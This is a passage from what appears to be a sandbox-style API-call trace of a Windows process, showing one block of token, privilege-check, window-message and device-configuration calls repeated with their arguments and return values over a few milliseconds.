pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.029] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.029] GetCurrentThread () returned 0xfffffffe [0017.029] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.029] GetLastError () returned 0x3f0 [0017.029] GetCurrentProcess () returned 0xffffffff [0017.029] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.029] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.029] SetLastError (dwErrCode=0x522) [0017.029] CloseHandle (hObject=0x114) returned 1 [0017.029] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.029] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.029] GetLastError () returned 0x578 [0017.029] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.029] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.029] GetCurrentThread () returned 0xfffffffe [0017.029] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.029] GetLastError () returned 0x3f0 [0017.029] GetCurrentProcess () returned 0xffffffff [0017.029] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.029] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.030] SetLastError (dwErrCode=0x522) [0017.030] CloseHandle (hObject=0x114) returned 1 [0017.030] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.030] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.030] GetLastError () returned 0x578 [0017.030] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.030] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.030] GetCurrentThread () returned 0xfffffffe [0017.030] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.030] GetLastError () returned 0x3f0 [0017.030] GetCurrentProcess () returned 0xffffffff [0017.030] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.030] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.030] SetLastError (dwErrCode=0x522) [0017.030] CloseHandle (hObject=0x114) returned 1 [0017.030] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.030] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.030] GetLastError () returned 0x578 [0017.030] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.030] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.030] GetCurrentThread () returned 0xfffffffe [0017.030] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.030] GetLastError () returned 0x3f0 [0017.030] GetCurrentProcess () returned 0xffffffff [0017.030] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.030] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.030] SetLastError (dwErrCode=0x522) [0017.030] CloseHandle (hObject=0x114) returned 1 [0017.030] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.030] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.030] GetLastError () returned 0x578 [0017.030] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.030] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.030] GetCurrentThread () returned 0xfffffffe [0017.030] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.030] GetLastError () returned 0x3f0 [0017.030] GetCurrentProcess () returned 0xffffffff [0017.030] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.030] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.030] SetLastError (dwErrCode=0x522) [0017.030] CloseHandle (hObject=0x114) returned 1 [0017.030] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.030] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.030] GetLastError () returned 0x578 [0017.030] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.031] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.031] GetCurrentThread () returned 0xfffffffe [0017.031] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.031] GetLastError () returned 0x3f0 [0017.031] GetCurrentProcess () returned 0xffffffff [0017.031] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.031] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.031] SetLastError (dwErrCode=0x522) [0017.031] CloseHandle (hObject=0x114) returned 1 [0017.031] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.031] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.031] GetLastError () returned 0x578 [0017.031] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.031] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.031] GetCurrentThread () returned 0xfffffffe [0017.031] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.031] GetLastError () returned 0x3f0 [0017.031] GetCurrentProcess () returned 0xffffffff [0017.031] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.031] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.031] SetLastError (dwErrCode=0x522) [0017.031] CloseHandle (hObject=0x114) returned 1 [0017.031] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.031] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.031] GetLastError () returned 0x578 [0017.031] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.031] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.031] GetCurrentThread () returned 0xfffffffe [0017.031] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.031] GetLastError () returned 0x3f0 [0017.031] GetCurrentProcess () returned 0xffffffff [0017.031] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.031] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.031] SetLastError (dwErrCode=0x522) [0017.031] CloseHandle (hObject=0x114) returned 1 [0017.031] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.031] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.031] GetLastError () returned 0x578 [0017.031] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.031] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.031] GetCurrentThread () returned 0xfffffffe [0017.031] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.032] GetLastError () returned 0x3f0 [0017.032] GetCurrentProcess () returned 0xffffffff [0017.032] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.032] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.032] SetLastError (dwErrCode=0x522) [0017.032] CloseHandle (hObject=0x114) returned 1 [0017.032] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.032] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.032] GetLastError () returned 0x578 [0017.032] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.032] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.032] GetCurrentThread () returned 0xfffffffe [0017.032] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.032] GetLastError () returned 0x3f0 [0017.032] GetCurrentProcess () returned 0xffffffff [0017.032] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.032] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.032] SetLastError (dwErrCode=0x522) [0017.032] CloseHandle (hObject=0x114) returned 1 [0017.032] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.032] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.032] GetLastError () returned 0x578 [0017.032] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.032] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.032] GetCurrentThread () returned 0xfffffffe [0017.032] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.032] GetLastError () returned 0x3f0 [0017.032] GetCurrentProcess () returned 0xffffffff [0017.032] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.032] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.032] SetLastError (dwErrCode=0x522) [0017.032] CloseHandle (hObject=0x114) returned 1 [0017.032] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.032] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.032] GetLastError () returned 0x578 [0017.032] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.032] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.032] GetCurrentThread () returned 0xfffffffe [0017.032] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.032] GetLastError () returned 0x3f0 [0017.032] GetCurrentProcess () returned 0xffffffff [0017.032] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.032] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.032] SetLastError (dwErrCode=0x522) [0017.033] CloseHandle (hObject=0x114) returned 1 [0017.033] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.033] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.033] GetLastError () returned 0x578 [0017.033] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.033] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.033] GetCurrentThread () returned 0xfffffffe [0017.033] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.033] GetLastError () returned 0x3f0 [0017.033] GetCurrentProcess () returned 0xffffffff [0017.033] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.033] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.033] SetLastError (dwErrCode=0x522) [0017.033] CloseHandle (hObject=0x114) returned 1 [0017.033] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.033] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.033] GetLastError () returned 0x578 [0017.033] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.033] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.033] GetCurrentThread () returned 0xfffffffe [0017.033] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.033] GetLastError () returned 0x3f0 [0017.033] GetCurrentProcess () returned 0xffffffff [0017.033] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.033] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.033] SetLastError (dwErrCode=0x522) [0017.033] CloseHandle (hObject=0x114) returned 1 [0017.033] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.033] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.033] GetLastError () returned 0x578 [0017.033] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.033] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.033] GetCurrentThread () returned 0xfffffffe [0017.033] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.033] GetLastError () returned 0x3f0 [0017.033] GetCurrentProcess () returned 0xffffffff [0017.033] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.033] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.033] SetLastError (dwErrCode=0x522) [0017.033] CloseHandle (hObject=0x114) returned 1 [0017.033] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.033] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.033] GetLastError () returned 0x578 [0017.033] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.033] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.034] GetCurrentThread () returned 0xfffffffe [0017.034] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.034] GetLastError () returned 0x3f0 [0017.034] GetCurrentProcess () returned 0xffffffff [0017.034] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.034] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.034] SetLastError (dwErrCode=0x522) [0017.034] CloseHandle (hObject=0x114) returned 1 [0017.034] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.034] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.034] GetLastError () returned 0x578 [0017.034] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.034] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.034] GetCurrentThread () returned 0xfffffffe [0017.034] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.034] GetLastError () returned 0x3f0 [0017.034] GetCurrentProcess () returned 0xffffffff [0017.034] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.034] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.034] SetLastError (dwErrCode=0x522) [0017.034] CloseHandle (hObject=0x114) returned 1 [0017.034] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.034] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.034] GetLastError () returned 0x578 [0017.034] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.034] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.034] GetCurrentThread () returned 0xfffffffe [0017.034] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.034] GetLastError () returned 0x3f0 [0017.034] GetCurrentProcess () returned 0xffffffff [0017.034] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.034] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.034] SetLastError (dwErrCode=0x522) [0017.034] CloseHandle (hObject=0x114) returned 1 [0017.034] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.034] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.034] GetLastError () returned 0x578 [0017.034] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.034] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.034] GetCurrentThread () returned 0xfffffffe [0017.034] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.034] GetLastError () returned 0x3f0 [0017.034] GetCurrentProcess () returned 0xffffffff [0017.034] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.035] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.035] SetLastError (dwErrCode=0x522) [0017.035] CloseHandle (hObject=0x114) returned 1 [0017.035] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.035] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.035] GetLastError () returned 0x578 [0017.035] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.035] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.035] GetCurrentThread () returned 0xfffffffe [0017.035] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.035] GetLastError () returned 0x3f0 [0017.035] GetCurrentProcess () returned 0xffffffff [0017.035] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.035] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.035] SetLastError (dwErrCode=0x522) [0017.035] CloseHandle (hObject=0x114) returned 1 [0017.035] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.035] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.035] GetLastError () returned 0x578 [0017.035] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.035] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.035] GetCurrentThread () returned 0xfffffffe [0017.035] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.035] GetLastError () returned 0x3f0 [0017.035] GetCurrentProcess () returned 0xffffffff [0017.035] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.035] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.035] SetLastError (dwErrCode=0x522) [0017.035] CloseHandle (hObject=0x114) returned 1 [0017.035] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.035] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.035] GetLastError () returned 0x578 [0017.035] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.035] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.035] GetCurrentThread () returned 0xfffffffe [0017.035] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.035] GetLastError () returned 0x3f0 [0017.035] GetCurrentProcess () returned 0xffffffff [0017.035] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.035] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.035] SetLastError (dwErrCode=0x522) [0017.035] CloseHandle (hObject=0x114) returned 1 [0017.036] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.036] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.036] GetLastError () returned 0x578 [0017.036] 